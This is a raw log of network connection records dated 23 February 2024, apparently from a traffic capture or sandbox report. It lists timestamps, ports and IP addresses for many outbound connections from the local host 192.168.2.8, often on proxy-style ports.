                                                                                Feb 23, 2024 14:28:22.985322952 CET5055536139192.168.2.8188.164.197.178
                                                                                Feb 23, 2024 14:28:22.985568047 CET808150232193.239.58.92192.168.2.8
                                                                                Feb 23, 2024 14:28:22.986426115 CET808150232193.239.58.92192.168.2.8
                                                                                Feb 23, 2024 14:28:22.986449003 CET5055623867192.168.2.8171.244.140.160
                                                                                Feb 23, 2024 14:28:22.986521959 CET502328081192.168.2.8193.239.58.92
                                                                                Feb 23, 2024 14:28:22.986587048 CET108050257103.109.59.193192.168.2.8
                                                                                Feb 23, 2024 14:28:22.986782074 CET502328081192.168.2.8193.239.58.92
                                                                                Feb 23, 2024 14:28:22.986782074 CET5055780192.168.2.850.173.140.148
                                                                                Feb 23, 2024 14:28:22.987092972 CET2005650256103.215.139.32192.168.2.8
                                                                                Feb 23, 2024 14:28:22.987596035 CET50558999192.168.2.8190.120.249.180
                                                                                Feb 23, 2024 14:28:22.987596989 CET505598081192.168.2.8193.239.58.92
                                                                                Feb 23, 2024 14:28:22.988531113 CET505608080192.168.2.849.48.68.63
                                                                                Feb 23, 2024 14:28:22.988543034 CET8050322194.34.232.107192.168.2.8
                                                                                Feb 23, 2024 14:28:22.988796949 CET5032280192.168.2.8194.34.232.107
                                                                                Feb 23, 2024 14:28:22.989104033 CET5032280192.168.2.8194.34.232.107
                                                                                Feb 23, 2024 14:28:22.989880085 CET4957950334162.19.7.46192.168.2.8
                                                                                Feb 23, 2024 14:28:22.990472078 CET505623128192.168.2.8201.91.82.155
                                                                                Feb 23, 2024 14:28:22.990473032 CET5056180192.168.2.8111.93.235.76
                                                                                Feb 23, 2024 14:28:22.990562916 CET5033449579192.168.2.8162.19.7.46
                                                                                Feb 23, 2024 14:28:22.990814924 CET5033449579192.168.2.8162.19.7.46
                                                                                Feb 23, 2024 14:28:22.991574049 CET5002580192.168.2.850.174.7.153
                                                                                Feb 23, 2024 14:28:22.991628885 CET500268459192.168.2.872.10.160.171
                                                                                Feb 23, 2024 14:28:22.992829084 CET5056411192.168.2.88.213.128.6
                                                                                Feb 23, 2024 14:28:22.992830038 CET5056348684192.168.2.846.101.210.101
                                                                                Feb 23, 2024 14:28:22.994091034 CET505658089192.168.2.8112.78.167.38
                                                                                Feb 23, 2024 14:28:22.994412899 CET5056641890192.168.2.8109.104.187.212
                                                                                Feb 23, 2024 14:28:22.994729996 CET8050448185.162.228.154192.168.2.8
                                                                                Feb 23, 2024 14:28:22.994837999 CET5056780192.168.2.847.250.46.217
                                                                                Feb 23, 2024 14:28:22.994925022 CET5044880192.168.2.8185.162.228.154
                                                                                Feb 23, 2024 14:28:22.995318890 CET5044880192.168.2.8185.162.228.154
                                                                                Feb 23, 2024 14:28:22.995704889 CET5056835568192.168.2.8107.172.79.64
                                                                                Feb 23, 2024 14:28:22.996329069 CET505698080192.168.2.8103.74.229.133
                                                                                Feb 23, 2024 14:28:22.996436119 CET8050451104.16.230.163192.168.2.8
                                                                                Feb 23, 2024 14:28:22.996617079 CET5045180192.168.2.8104.16.230.163
                                                                                Feb 23, 2024 14:28:22.996876955 CET5045180192.168.2.8104.16.230.163
                                                                                Feb 23, 2024 14:28:22.997237921 CET5057058839192.168.2.8165.227.104.122
                                                                                Feb 23, 2024 14:28:22.997591019 CET41535026593.90.212.2192.168.2.8
                                                                                Feb 23, 2024 14:28:22.997829914 CET502654153192.168.2.893.90.212.2
                                                                                Feb 23, 2024 14:28:22.998084068 CET505718080192.168.2.8186.103.130.91
                                                                                Feb 23, 2024 14:28:22.998343945 CET502654153192.168.2.893.90.212.2
                                                                                Feb 23, 2024 14:28:22.999093056 CET8350216103.155.54.38192.168.2.8
                                                                                Feb 23, 2024 14:28:22.999166965 CET505724145192.168.2.8199.229.254.129
                                                                                Feb 23, 2024 14:28:22.999166965 CET5057380192.168.2.8104.20.125.124
                                                                                Feb 23, 2024 14:28:22.999711037 CET50574999192.168.2.8191.102.68.178
                                                                                Feb 23, 2024 14:28:23.001107931 CET505754153192.168.2.845.7.210.195
                                                                                Feb 23, 2024 14:28:23.001379967 CET5057680192.168.2.8104.24.15.158
                                                                                Feb 23, 2024 14:28:23.001550913 CET505778089192.168.2.8111.225.152.243
                                                                                Feb 23, 2024 14:28:23.002198935 CET4408750349185.244.36.240192.168.2.8
                                                                                Feb 23, 2024 14:28:23.002551079 CET50325030845.11.95.165192.168.2.8
                                                                                Feb 23, 2024 14:28:23.002640963 CET5057880192.168.2.8185.162.228.48
                                                                                Feb 23, 2024 14:28:23.002710104 CET503085032192.168.2.845.11.95.165
                                                                                Feb 23, 2024 14:28:23.002919912 CET5057980192.168.2.8104.25.135.170
                                                                                Feb 23, 2024 14:28:23.003093958 CET503085032192.168.2.845.11.95.165
                                                                                Feb 23, 2024 14:28:23.003592968 CET505808081192.168.2.8117.160.250.163
                                                                                Feb 23, 2024 14:28:23.004890919 CET5058280192.168.2.8189.202.188.149
                                                                                Feb 23, 2024 14:28:23.007215023 CET5018380192.168.2.834.135.166.24
                                                                                Feb 23, 2024 14:28:23.007215023 CET499794635192.168.2.893.115.25.139
                                                                                Feb 23, 2024 14:28:23.007226944 CET4979657230192.168.2.8103.28.86.241
                                                                                Feb 23, 2024 14:28:23.007229090 CET499378080192.168.2.8200.108.234.105
                                                                                Feb 23, 2024 14:28:23.007237911 CET4979740927192.168.2.8213.136.78.200
                                                                                Feb 23, 2024 14:28:23.007241011 CET4979816379192.168.2.851.158.105.107
                                                                                Feb 23, 2024 14:28:23.008905888 CET128994998672.10.160.170192.168.2.8
                                                                                Feb 23, 2024 14:28:23.013186932 CET2789050316185.198.58.47192.168.2.8
                                                                                Feb 23, 2024 14:28:23.013348103 CET31284998718.135.211.182192.168.2.8
                                                                                Feb 23, 2024 14:28:23.014131069 CET604065037154.38.179.203192.168.2.8
                                                                                Feb 23, 2024 14:28:23.014314890 CET5037160406192.168.2.854.38.179.203
                                                                                Feb 23, 2024 14:28:23.014969110 CET8050374192.210.148.89192.168.2.8
                                                                                Feb 23, 2024 14:28:23.015851021 CET505813128192.168.2.8194.93.25.55
                                                                                Feb 23, 2024 14:28:23.016144991 CET505833128192.168.2.837.252.13.248
                                                                                Feb 23, 2024 14:28:23.016388893 CET5037160406192.168.2.854.38.179.203
                                                                                Feb 23, 2024 14:28:23.017055988 CET505849997192.168.2.864.225.4.85
                                                                                Feb 23, 2024 14:28:23.017921925 CET505858080192.168.2.838.172.128.24
                                                                                Feb 23, 2024 14:28:23.018637896 CET8050469172.67.150.173192.168.2.8
                                                                                Feb 23, 2024 14:28:23.018707037 CET45698499005.183.179.117192.168.2.8
                                                                                Feb 23, 2024 14:28:23.018838882 CET5046980192.168.2.8172.67.150.173
                                                                                Feb 23, 2024 14:28:23.018979073 CET505863129192.168.2.820.204.190.254
                                                                                Feb 23, 2024 14:28:23.019112110 CET5046980192.168.2.8172.67.150.173
                                                                                Feb 23, 2024 14:28:23.019567966 CET41455047098.162.25.23192.168.2.8
                                                                                Feb 23, 2024 14:28:23.019956112 CET504704145192.168.2.898.162.25.23
                                                                                Feb 23, 2024 14:28:23.020153046 CET8050473172.64.86.217192.168.2.8
                                                                                Feb 23, 2024 14:28:23.020198107 CET505874145192.168.2.8197.234.13.49
                                                                                Feb 23, 2024 14:28:23.020277977 CET5047380192.168.2.8172.64.86.217
                                                                                Feb 23, 2024 14:28:23.020577908 CET8050128113.30.149.76192.168.2.8
                                                                                Feb 23, 2024 14:28:23.020654917 CET5047380192.168.2.8172.64.86.217
                                                                                Feb 23, 2024 14:28:23.020680904 CET8050128113.30.149.76192.168.2.8
                                                                                Feb 23, 2024 14:28:23.021403074 CET203255046572.10.164.178192.168.2.8
                                                                                Feb 23, 2024 14:28:23.022830009 CET5005844712192.168.2.892.204.135.4
                                                                                Feb 23, 2024 14:28:23.024549961 CET8050359104.21.6.88192.168.2.8
                                                                                Feb 23, 2024 14:28:23.024561882 CET8050359104.21.6.88192.168.2.8
                                                                                Feb 23, 2024 14:28:23.024579048 CET3346650193141.94.174.6192.168.2.8
                                                                                Feb 23, 2024 14:28:23.024594069 CET3346650193141.94.174.6192.168.2.8
                                                                                Feb 23, 2024 14:28:23.024806023 CET5019333466192.168.2.8141.94.174.6
                                                                                Feb 23, 2024 14:28:23.025935888 CET8050361104.17.166.210192.168.2.8
                                                                                Feb 23, 2024 14:28:23.026401997 CET8050361104.17.166.210192.168.2.8
                                                                                Feb 23, 2024 14:28:23.026520014 CET8050359104.21.6.88192.168.2.8
                                                                                Feb 23, 2024 14:28:23.027204037 CET8050361104.17.166.210192.168.2.8
                                                                                Feb 23, 2024 14:28:23.027283907 CET5035980192.168.2.8104.21.6.88
                                                                                Feb 23, 2024 14:28:23.027585030 CET804992650.222.245.46192.168.2.8
                                                                                Feb 23, 2024 14:28:23.027857065 CET5036180192.168.2.8104.17.166.210
                                                                                Feb 23, 2024 14:28:23.028709888 CET5084750389162.19.7.50192.168.2.8
                                                                                Feb 23, 2024 14:28:23.029968023 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.030000925 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.030057907 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.030097008 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.030128956 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.030136108 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.030190945 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.030215025 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.030222893 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.030265093 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.030343056 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.030349970 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.030359030 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.030374050 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.030390024 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.030633926 CET8050370113.30.149.76192.168.2.8
                                                                                Feb 23, 2024 14:28:23.031414986 CET5037080192.168.2.8113.30.149.76
                                                                                Feb 23, 2024 14:28:23.031738997 CET5037080192.168.2.8113.30.149.76
                                                                                Feb 23, 2024 14:28:23.031738997 CET5058839811192.168.2.8213.244.79.227
                                                                                Feb 23, 2024 14:28:23.032599926 CET414550260107.181.161.81192.168.2.8
                                                                                Feb 23, 2024 14:28:23.033025980 CET414550260107.181.161.81192.168.2.8
                                                                                Feb 23, 2024 14:28:23.033054113 CET5036180192.168.2.8104.17.166.210
                                                                                Feb 23, 2024 14:28:23.033574104 CET8050175190.103.177.131192.168.2.8
                                                                                Feb 23, 2024 14:28:23.034638882 CET804998832.223.6.94192.168.2.8
                                                                                Feb 23, 2024 14:28:23.036881924 CET505894145192.168.2.8107.181.161.81
                                                                                Feb 23, 2024 14:28:23.037031889 CET808049872177.229.210.50192.168.2.8
                                                                                Feb 23, 2024 14:28:23.037127972 CET1080497665.201.140.196192.168.2.8
                                                                                Feb 23, 2024 14:28:23.037162066 CET8050384104.20.233.70192.168.2.8
                                                                                Feb 23, 2024 14:28:23.037240028 CET8050384104.20.233.70192.168.2.8
                                                                                Feb 23, 2024 14:28:23.038089037 CET8050384104.20.233.70192.168.2.8
                                                                                Feb 23, 2024 14:28:23.038178921 CET5035980192.168.2.8104.21.6.88
                                                                                Feb 23, 2024 14:28:23.038261890 CET5038480192.168.2.8104.20.233.70
                                                                                Feb 23, 2024 14:28:23.038463116 CET4980180192.168.2.813.209.156.241
                                                                                Feb 23, 2024 14:28:23.038464069 CET498059735192.168.2.8216.10.242.18
                                                                                Feb 23, 2024 14:28:23.038465023 CET497993409192.168.2.8216.10.242.18
                                                                                Feb 23, 2024 14:28:23.038480997 CET499104145192.168.2.81.2.221.134
                                                                                Feb 23, 2024 14:28:23.038481951 CET4980780192.168.2.8207.180.250.238
                                                                                Feb 23, 2024 14:28:23.038481951 CET4980363718192.168.2.892.205.105.134
                                                                                Feb 23, 2024 14:28:23.038481951 CET4980612000192.168.2.8217.182.153.29
                                                                                Feb 23, 2024 14:28:23.038496971 CET498091981192.168.2.8165.16.27.109
                                                                                Feb 23, 2024 14:28:23.038497925 CET4981561725192.168.2.8104.248.158.78
                                                                                Feb 23, 2024 14:28:23.038499117 CET498108080192.168.2.8202.137.144.228
                                                                                Feb 23, 2024 14:28:23.038547039 CET8050385185.162.229.215192.168.2.8
                                                                                Feb 23, 2024 14:28:23.038573027 CET8050385185.162.229.215192.168.2.8
                                                                                Feb 23, 2024 14:28:23.038597107 CET498113865192.168.2.851.210.45.148
                                                                                Feb 23, 2024 14:28:23.038602114 CET4980812196192.168.2.831.200.242.201
                                                                                Feb 23, 2024 14:28:23.039407015 CET5038480192.168.2.8104.20.233.70
                                                                                Feb 23, 2024 14:28:23.039450884 CET8050385185.162.229.215192.168.2.8
                                                                                Feb 23, 2024 14:28:23.039649010 CET5038580192.168.2.8185.162.229.215
                                                                                Feb 23, 2024 14:28:23.040612936 CET805037250.168.7.250192.168.2.8
                                                                                Feb 23, 2024 14:28:23.040791035 CET805041718.133.16.21192.168.2.8
                                                                                Feb 23, 2024 14:28:23.040867090 CET5041780192.168.2.818.133.16.21
                                                                                Feb 23, 2024 14:28:23.041425943 CET5038580192.168.2.8185.162.229.215
                                                                                Feb 23, 2024 14:28:23.042238951 CET805039145.12.31.140192.168.2.8
                                                                                Feb 23, 2024 14:28:23.042737961 CET804989250.204.219.227192.168.2.8
                                                                                Feb 23, 2024 14:28:23.043195009 CET805039145.12.31.140192.168.2.8
                                                                                Feb 23, 2024 14:28:23.043894053 CET805039145.12.31.140192.168.2.8
                                                                                Feb 23, 2024 14:28:23.047074080 CET31294992220.219.177.85192.168.2.8
                                                                                Feb 23, 2024 14:28:23.047117949 CET31294992220.219.177.85192.168.2.8
                                                                                Feb 23, 2024 14:28:23.047164917 CET31294992220.219.177.85192.168.2.8
                                                                                Feb 23, 2024 14:28:23.047204018 CET31294992220.219.177.85192.168.2.8
                                                                                Feb 23, 2024 14:28:23.047214985 CET499223129192.168.2.820.219.177.85
                                                                                Feb 23, 2024 14:28:23.047322989 CET5039180192.168.2.845.12.31.140
                                                                                Feb 23, 2024 14:28:23.048192024 CET108049885185.157.47.236192.168.2.8
                                                                                Feb 23, 2024 14:28:23.048213005 CET499223129192.168.2.820.219.177.85
                                                                                Feb 23, 2024 14:28:23.048583031 CET8050420184.169.154.119192.168.2.8
                                                                                Feb 23, 2024 14:28:23.048819065 CET261695050567.43.236.20192.168.2.8
                                                                                Feb 23, 2024 14:28:23.048880100 CET5042080192.168.2.8184.169.154.119
                                                                                Feb 23, 2024 14:28:23.051105976 CET4891550321138.201.21.232192.168.2.8
                                                                                Feb 23, 2024 14:28:23.051358938 CET844349883101.231.64.89192.168.2.8
                                                                                Feb 23, 2024 14:28:23.051388979 CET844349883101.231.64.89192.168.2.8
                                                                                Feb 23, 2024 14:28:23.051970005 CET5041780192.168.2.818.133.16.21
                                                                                Feb 23, 2024 14:28:23.052201033 CET805040331.43.179.214192.168.2.8
                                                                                Feb 23, 2024 14:28:23.052292109 CET805040331.43.179.214192.168.2.8
                                                                                Feb 23, 2024 14:28:23.052315950 CET5039180192.168.2.845.12.31.140
                                                                                Feb 23, 2024 14:28:23.052733898 CET805040331.43.179.214192.168.2.8
                                                                                Feb 23, 2024 14:28:23.052824020 CET844350266101.231.64.89192.168.2.8
                                                                                Feb 23, 2024 14:28:23.052882910 CET502668443192.168.2.8101.231.64.89
                                                                                Feb 23, 2024 14:28:23.052885056 CET5040380192.168.2.831.43.179.214
                                                                                Feb 23, 2024 14:28:23.053726912 CET15855051467.43.236.20192.168.2.8
                                                                                Feb 23, 2024 14:28:23.053807974 CET5042080192.168.2.8184.169.154.119
                                                                                Feb 23, 2024 14:28:23.053808928 CET5040380192.168.2.831.43.179.214
                                                                                Feb 23, 2024 14:28:23.054090977 CET808050392185.38.111.1192.168.2.8
                                                                                Feb 23, 2024 14:28:23.054104090 CET4981334644192.168.2.850.63.12.33
                                                                                Feb 23, 2024 14:28:23.054104090 CET500153128192.168.2.837.120.222.132
                                                                                Feb 23, 2024 14:28:23.054105043 CET498124153192.168.2.8103.78.54.10
                                                                                Feb 23, 2024 14:28:23.054106951 CET4996880192.168.2.8154.113.121.60
                                                                                Feb 23, 2024 14:28:23.054106951 CET4981742560192.168.2.866.29.128.244
                                                                                Feb 23, 2024 14:28:23.054133892 CET4981949042192.168.2.891.134.140.160
                                                                                Feb 23, 2024 14:28:23.054133892 CET4982339593192.168.2.896.36.50.99
                                                                                Feb 23, 2024 14:28:23.054133892 CET498144145192.168.2.8117.20.56.203
                                                                                Feb 23, 2024 14:28:23.054164886 CET503928080192.168.2.8185.38.111.1
                                                                                Feb 23, 2024 14:28:23.054166079 CET498253889192.168.2.81.224.3.122
                                                                                Feb 23, 2024 14:28:23.054363012 CET676450429198.105.111.86192.168.2.8
                                                                                Feb 23, 2024 14:28:23.054858923 CET502668443192.168.2.8101.231.64.89
                                                                                Feb 23, 2024 14:28:23.054862022 CET504296764192.168.2.8198.105.111.86
                                                                                Feb 23, 2024 14:28:23.055835009 CET152655051772.10.160.90192.168.2.8
                                                                                Feb 23, 2024 14:28:23.056572914 CET503928080192.168.2.8185.38.111.1
                                                                                Feb 23, 2024 14:28:23.056813955 CET5019333466192.168.2.8141.94.174.6
                                                                                Feb 23, 2024 14:28:23.056847095 CET9995044145.229.34.174192.168.2.8
                                                                                Feb 23, 2024 14:28:23.059433937 CET504296764192.168.2.8198.105.111.86
                                                                                Feb 23, 2024 14:28:23.061496019 CET200035052372.10.160.171192.168.2.8
                                                                                Feb 23, 2024 14:28:23.062906027 CET505906467192.168.2.8107.181.141.70
                                                                                Feb 23, 2024 14:28:23.063101053 CET505913128192.168.2.813.37.59.99
                                                                                Feb 23, 2024 14:28:23.063577890 CET8050423104.20.75.132192.168.2.8
                                                                                Feb 23, 2024 14:28:23.063604116 CET499223129192.168.2.820.219.177.85
                                                                                Feb 23, 2024 14:28:23.063607931 CET8050423104.20.75.132192.168.2.8
                                                                                Feb 23, 2024 14:28:23.064148903 CET8050423104.20.75.132192.168.2.8
                                                                                Feb 23, 2024 14:28:23.064366102 CET5042380192.168.2.8104.20.75.132
                                                                                Feb 23, 2024 14:28:23.064512968 CET5042380192.168.2.8104.20.75.132
                                                                                Feb 23, 2024 14:28:23.066726923 CET805047950.168.163.181192.168.2.8
                                                                                Feb 23, 2024 14:28:23.069597006 CET805051950.217.226.40192.168.2.8
                                                                                Feb 23, 2024 14:28:23.069715977 CET498184145192.168.2.8182.52.83.112
                                                                                Feb 23, 2024 14:28:23.069719076 CET498291080192.168.2.8177.8.170.122
                                                                                Feb 23, 2024 14:28:23.069732904 CET5006280192.168.2.850.173.140.150
                                                                                Feb 23, 2024 14:28:23.069732904 CET5007920695192.168.2.867.43.236.20
                                                                                Feb 23, 2024 14:28:23.069734097 CET498308080192.168.2.8183.89.14.229
                                                                                Feb 23, 2024 14:28:23.069753885 CET498248888192.168.2.835.199.90.225
                                                                                Feb 23, 2024 14:28:23.069756031 CET4983462181192.168.2.8145.239.2.102
                                                                                Feb 23, 2024 14:28:23.069756031 CET498273128192.168.2.883.149.249.81
                                                                                Feb 23, 2024 14:28:23.069756031 CET4983262842192.168.2.8146.190.84.209
                                                                                Feb 23, 2024 14:28:23.069767952 CET4983525369192.168.2.8208.87.131.151
                                                                                Feb 23, 2024 14:28:23.069768906 CET4983317270192.168.2.892.204.136.149
                                                                                Feb 23, 2024 14:28:23.069820881 CET4983634006192.168.2.8147.45.40.89
                                                                                Feb 23, 2024 14:28:23.070175886 CET4982851778192.168.2.8192.169.226.96
                                                                                Feb 23, 2024 14:28:23.071537971 CET116735046650.63.13.3192.168.2.8
                                                                                Feb 23, 2024 14:28:23.071641922 CET5046611673192.168.2.850.63.13.3
                                                                                Feb 23, 2024 14:28:23.072292089 CET2500749896154.12.253.232192.168.2.8
                                                                                Feb 23, 2024 14:28:23.073587894 CET31285039679.101.37.78192.168.2.8
                                                                                Feb 23, 2024 14:28:23.073668957 CET41454976168.1.210.189192.168.2.8
                                                                                Feb 23, 2024 14:28:23.074003935 CET31285019834.83.143.6192.168.2.8
                                                                                Feb 23, 2024 14:28:23.074023962 CET497614145192.168.2.868.1.210.189
                                                                                Feb 23, 2024 14:28:23.077022076 CET501983128192.168.2.834.83.143.6
                                                                                Feb 23, 2024 14:28:23.077291012 CET497614145192.168.2.868.1.210.189
                                                                                Feb 23, 2024 14:28:23.077393055 CET5046611673192.168.2.850.63.13.3
                                                                                Feb 23, 2024 14:28:23.080050945 CET141335055467.43.236.20192.168.2.8
                                                                                Feb 23, 2024 14:28:23.080487967 CET5059280192.168.2.850.174.145.9
                                                                                Feb 23, 2024 14:28:23.082467079 CET505935678192.168.2.8189.84.125.189
                                                                                Feb 23, 2024 14:28:23.083019972 CET8050448185.162.228.154192.168.2.8
                                                                                Feb 23, 2024 14:28:23.083024025 CET5059530883192.168.2.867.43.227.228
                                                                                Feb 23, 2024 14:28:23.083095074 CET8050448185.162.228.154192.168.2.8
                                                                                Feb 23, 2024 14:28:23.083292007 CET8050448185.162.228.154192.168.2.8
                                                                                Feb 23, 2024 14:28:23.083482981 CET5044880192.168.2.8185.162.228.154
                                                                                Feb 23, 2024 14:28:23.083723068 CET44815050750.231.0.43192.168.2.8
                                                                                Feb 23, 2024 14:28:23.084388971 CET505941080192.168.2.827.65.30.37
                                                                                Feb 23, 2024 14:28:23.084389925 CET505963128192.168.2.8103.176.179.84
                                                                                Feb 23, 2024 14:28:23.084763050 CET8050451104.16.230.163192.168.2.8
                                                                                Feb 23, 2024 14:28:23.084811926 CET8050451104.16.230.163192.168.2.8
                                                                                Feb 23, 2024 14:28:23.084832907 CET5044880192.168.2.8185.162.228.154
                                                                                Feb 23, 2024 14:28:23.085064888 CET5045180192.168.2.8104.16.230.163
                                                                                Feb 23, 2024 14:28:23.085067034 CET8050451104.16.230.163192.168.2.8
                                                                                Feb 23, 2024 14:28:23.085067034 CET505973629192.168.2.8202.138.249.15
                                                                                Feb 23, 2024 14:28:23.085326910 CET5059880192.168.2.850.200.12.80
                                                                                Feb 23, 2024 14:28:23.085326910 CET499337497192.168.2.868.183.88.14
                                                                                Feb 23, 2024 14:28:23.085345030 CET498388089192.168.2.8103.143.8.126
                                                                                Feb 23, 2024 14:28:23.085345984 CET498373125192.168.2.8103.1.50.51
                                                                                Feb 23, 2024 14:28:23.085349083 CET5000580192.168.2.850.239.72.18
                                                                                Feb 23, 2024 14:28:23.085355043 CET498458080192.168.2.8103.147.246.131
                                                                                Feb 23, 2024 14:28:23.085355997 CET4984260781192.168.2.8132.148.129.254
                                                                                Feb 23, 2024 14:28:23.085369110 CET498448080192.168.2.8107.178.9.186
                                                                                Feb 23, 2024 14:28:23.085370064 CET4984880192.168.2.8162.240.75.37
                                                                                Feb 23, 2024 14:28:23.085370064 CET498513128192.168.2.8193.239.86.247
                                                                                Feb 23, 2024 14:28:23.085370064 CET498468080192.168.2.8103.239.253.66
                                                                                Feb 23, 2024 14:28:23.085387945 CET5045180192.168.2.8104.16.230.163
                                                                                Feb 23, 2024 14:28:23.085388899 CET4996548744192.168.2.8182.160.127.53
                                                                                Feb 23, 2024 14:28:23.086066961 CET805002550.174.7.153192.168.2.8
                                                                                Feb 23, 2024 14:28:23.086464882 CET84595002672.10.160.171192.168.2.8
                                                                                Feb 23, 2024 14:28:23.086679935 CET5686250486166.62.53.45192.168.2.8
                                                                                Feb 23, 2024 14:28:23.086882114 CET5048656862192.168.2.8166.62.53.45
                                                                                Feb 23, 2024 14:28:23.087112904 CET8050573104.20.125.124192.168.2.8
                                                                                Feb 23, 2024 14:28:23.087145090 CET5048656862192.168.2.8166.62.53.45
                                                                                Feb 23, 2024 14:28:23.087342978 CET5057380192.168.2.8104.20.125.124
                                                                                Feb 23, 2024 14:28:23.087467909 CET5057380192.168.2.8104.20.125.124
                                                                                Feb 23, 2024 14:28:23.087662935 CET99949957191.97.19.66192.168.2.8
                                                                                Feb 23, 2024 14:28:23.088293076 CET8050576104.24.15.158192.168.2.8
                                                                                Feb 23, 2024 14:28:23.088483095 CET5057680192.168.2.8104.24.15.158
                                                                                Feb 23, 2024 14:28:23.088687897 CET5057680192.168.2.8104.24.15.158
                                                                                Feb 23, 2024 14:28:23.089807987 CET10885043446.227.37.1192.168.2.8
                                                                                Feb 23, 2024 14:28:23.089975119 CET378649751148.72.212.212192.168.2.8
                                                                                Feb 23, 2024 14:28:23.090238094 CET8050578185.162.228.48192.168.2.8
                                                                                Feb 23, 2024 14:28:23.090478897 CET8050579104.25.135.170192.168.2.8
                                                                                Feb 23, 2024 14:28:23.090540886 CET5057880192.168.2.8185.162.228.48
                                                                                Feb 23, 2024 14:28:23.090584993 CET5057980192.168.2.8104.25.135.170
                                                                                Feb 23, 2024 14:28:23.093170881 CET5057880192.168.2.8185.162.228.48
                                                                                Feb 23, 2024 14:28:23.093296051 CET5057980192.168.2.8104.25.135.170
                                                                                Feb 23, 2024 14:28:23.094310045 CET5059980192.168.2.8190.128.228.182
                                                                                Feb 23, 2024 14:28:23.095031977 CET506003283192.168.2.872.10.160.173
                                                                                Feb 23, 2024 14:28:23.095148087 CET777750044123.30.154.171192.168.2.8
                                                                                Feb 23, 2024 14:28:23.095583916 CET5060131280192.168.2.882.113.157.122
                                                                                Feb 23, 2024 14:28:23.095963001 CET808050029103.216.50.11192.168.2.8
                                                                                Feb 23, 2024 14:28:23.096055984 CET808050029103.216.50.11192.168.2.8
                                                                                Feb 23, 2024 14:28:23.096225977 CET804979213.229.47.109192.168.2.8
                                                                                Feb 23, 2024 14:28:23.096329927 CET500298080192.168.2.8103.216.50.11
                                                                                Feb 23, 2024 14:28:23.096932888 CET808050029103.216.50.11192.168.2.8
                                                                                Feb 23, 2024 14:28:23.097163916 CET500298080192.168.2.8103.216.50.11
                                                                                Feb 23, 2024 14:28:23.097744942 CET50602999192.168.2.8201.182.149.29
                                                                                Feb 23, 2024 14:28:23.100975990 CET5011555919192.168.2.845.79.191.205
                                                                                Feb 23, 2024 14:28:23.100994110 CET5005111201192.168.2.838.41.0.6
                                                                                Feb 23, 2024 14:28:23.100994110 CET498433128192.168.2.851.15.125.244
                                                                                Feb 23, 2024 14:28:23.100994110 CET4985680192.168.2.852.41.249.10
                                                                                Feb 23, 2024 14:28:23.100995064 CET498478080192.168.2.8103.188.168.66
                                                                                Feb 23, 2024 14:28:23.101007938 CET5007880192.168.2.850.173.140.151
                                                                                Feb 23, 2024 14:28:23.101007938 CET498544145192.168.2.8197.234.13.5
                                                                                Feb 23, 2024 14:28:23.101012945 CET498551981192.168.2.8154.236.179.229
                                                                                Feb 23, 2024 14:28:23.103189945 CET5060344749192.168.2.8200.29.109.112
                                                                                Feb 23, 2024 14:28:23.103693008 CET8049858210.209.236.26192.168.2.8
                                                                                Feb 23, 2024 14:28:23.103779078 CET156735035243.153.133.208192.168.2.8
                                                                                Feb 23, 2024 14:28:23.103888988 CET5060415419192.168.2.8104.238.111.107
                                                                                Feb 23, 2024 14:28:23.104018927 CET5035215673192.168.2.843.153.133.208
                                                                                Feb 23, 2024 14:28:23.104018927 CET5035215673192.168.2.843.153.133.208
                                                                                Feb 23, 2024 14:28:23.105201006 CET41454971172.210.208.101192.168.2.8
                                                                                Feb 23, 2024 14:28:23.105214119 CET41454971172.210.208.101192.168.2.8
                                                                                Feb 23, 2024 14:28:23.105217934 CET506054145192.168.2.861.7.138.226
                                                                                Feb 23, 2024 14:28:23.105700970 CET5060616517192.168.2.8194.163.129.179
                                                                                Feb 23, 2024 14:28:23.105999947 CET506074145192.168.2.872.210.208.101
                                                                                Feb 23, 2024 14:28:23.106764078 CET8050469172.67.150.173192.168.2.8
                                                                                Feb 23, 2024 14:28:23.106789112 CET8050469172.67.150.173192.168.2.8
                                                                                Feb 23, 2024 14:28:23.106813908 CET506084145192.168.2.8142.54.226.214
                                                                                Feb 23, 2024 14:28:23.106822968 CET97415049294.142.137.203192.168.2.8
                                                                                Feb 23, 2024 14:28:23.106903076 CET504929741192.168.2.894.142.137.203
                                                                                Feb 23, 2024 14:28:23.107003927 CET5116749945207.180.236.140192.168.2.8
                                                                                Feb 23, 2024 14:28:23.107039928 CET504929741192.168.2.894.142.137.203
                                                                                Feb 23, 2024 14:28:23.107059956 CET5046980192.168.2.8172.67.150.173
                                                                                Feb 23, 2024 14:28:23.107364893 CET3953350481167.172.109.12192.168.2.8
                                                                                Feb 23, 2024 14:28:23.107507944 CET506098080192.168.2.88.213.128.6
                                                                                Feb 23, 2024 14:28:23.107578039 CET8050469172.67.150.173192.168.2.8
                                                                                Feb 23, 2024 14:28:23.107747078 CET804985043.231.22.229192.168.2.8
                                                                                Feb 23, 2024 14:28:23.108184099 CET5046980192.168.2.8172.67.150.173
                                                                                Feb 23, 2024 14:28:23.108273983 CET8050473172.64.86.217192.168.2.8
                                                                                Feb 23, 2024 14:28:23.108344078 CET8050473172.64.86.217192.168.2.8
                                                                                Feb 23, 2024 14:28:23.108500957 CET5047380192.168.2.8172.64.86.217
                                                                                Feb 23, 2024 14:28:23.109357119 CET8050473172.64.86.217192.168.2.8
                                                                                Feb 23, 2024 14:28:23.109946966 CET5047380192.168.2.8172.64.86.217
                                                                                Feb 23, 2024 14:28:23.110088110 CET3979650490141.94.174.6192.168.2.8
